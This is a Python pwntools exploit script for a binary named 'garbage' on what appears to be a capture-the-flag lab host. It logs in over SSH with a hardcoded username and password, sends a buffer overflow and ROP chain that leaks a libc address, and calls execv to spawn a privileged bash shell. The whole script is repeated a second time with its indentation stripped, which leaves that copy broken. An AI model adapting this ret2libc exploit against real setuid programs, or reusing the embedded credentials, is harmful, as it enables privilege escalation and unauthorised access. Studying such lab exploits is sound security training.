KaoRz/xpl.py

## xpl.py
import os, sys
from pwn import *

HOST = '10.10.10.139'
USER = 'margo'
PASS = 'iamgod$08'
LOCAL = False

elf  = ELF('./garbage')

context.terminal = ['tmux', 'sp', '-h']
# context.log_level = 'DEBUG'

if LOCAL == True:
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)
    io = process(elf.path, stdin = PTY)

else:
    libc = ELF('./libc.so.6', checksec = False)
    f = open('/dev/null', 'w')
    sys.stderr = f
    shell = ssh(USER, HOST, password = PASS)
    io = shell.run('/usr/bin/garbage')

leak = flat(
            'A' * 136,
            0x40179b,           # 0x000000000040179b : pop rdi ; ret
            elf.got['puts'],
            elf.sym['puts'],
            0x40179b,           # 0x000000000040179b : pop rdi ; ret
            0x404100,           # .bss + 48
            elf.sym['gets'],
            0x401016,           # 0x0000000000401016 : ret <Alignment>
            0x401619,           # .text:0000000000401619 : push rbp (main)
            endianness = 'little', word_size = 64, sign = False)

io.sendlineafter('access password: ', leak)

io.recvuntil('denied.\n')
leak = u64(io.recvline()[:-1].ljust(8, '\x00'))
libc.address = leak - libc.sym['puts']

log.success('Leaked puts@@GLIBC: ' + hex(leak))
log.info('GLIBC base address: ' + hex(libc.address))
log.info('GLIBC execv address: ' + hex(libc.sym['execv']))

fake_array  = ''
fake_array += p64(0x404100 + 24)
fake_array += p64(0x404100 + 34)
fake_array += '\x00' * 8
fake_array += '/bin/bash\x00-p'

sleep(0.5)
io.sendline(fake_array)

shell = flat(
            'A' * 136,
            0x40179b,           # 0x000000000040179b : pop rdi ; ret
            0x404100 + 24,      # .bss + 72 ('/bin/bash')
            0x401799,           # 0x0000000000401799 : pop rsi ; pop r15 ; ret
            0x404100,           # .bss + 48
            'A' * 8,            # Junk
            0x401016,           # 0x0000000000401016 : ret <Alignment>
            libc.sym['execv'],
            endianness = 'little', word_size = 64, sign = False)

log.progress('Spawning shell...')
io.sendlineafter('access password: ', shell)
io.recv()

io.interactive()
io.close()
	import os, sys
	from pwn import *

	HOST = '10.10.10.139'
	USER = 'margo'
	PASS = 'iamgod$08'
	LOCAL = False

	elf = ELF('./garbage')

	context.terminal = ['tmux', 'sp', '-h']
	# context.log_level = 'DEBUG'

	if LOCAL == True:
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)
	io = process(elf.path, stdin = PTY)

	else:
	libc = ELF('./libc.so.6', checksec = False)
	f = open('/dev/null', 'w')
	sys.stderr = f
	shell = ssh(USER, HOST, password = PASS)
	io = shell.run('/usr/bin/garbage')

	leak = flat(
	'A' * 136,
	0x40179b, # 0x000000000040179b : pop rdi ; ret
	elf.got['puts'],
	elf.sym['puts'],
	0x40179b, # 0x000000000040179b : pop rdi ; ret
	0x404100, # .bss + 48
	elf.sym['gets'],
	0x401016, # 0x0000000000401016 : ret <Alignment>
	0x401619, # .text:0000000000401619 : push rbp (main)
	endianness = 'little', word_size = 64, sign = False)

	io.sendlineafter('access password: ', leak)

	io.recvuntil('denied.\n')
	leak = u64(io.recvline()[:-1].ljust(8, '\x00'))
	libc.address = leak - libc.sym['puts']

	log.success('Leaked puts@@GLIBC: ' + hex(leak))
	log.info('GLIBC base address: ' + hex(libc.address))
	log.info('GLIBC execv address: ' + hex(libc.sym['execv']))

	fake_array = ''
	fake_array += p64(0x404100 + 24)
	fake_array += p64(0x404100 + 34)
	fake_array += '\x00' * 8
	fake_array += '/bin/bash\x00-p'

	sleep(0.5)
	io.sendline(fake_array)

	shell = flat(
	'A' * 136,
	0x40179b, # 0x000000000040179b : pop rdi ; ret
	0x404100 + 24, # .bss + 72 ('/bin/bash')
	0x401799, # 0x0000000000401799 : pop rsi ; pop r15 ; ret
	0x404100, # .bss + 48
	'A' * 8, # Junk
	0x401016, # 0x0000000000401016 : ret <Alignment>
	libc.sym['execv'],
	endianness = 'little', word_size = 64, sign = False)

	log.progress('Spawning shell...')
	io.sendlineafter('access password: ', shell)
	io.recv()

	io.interactive()
	io.close()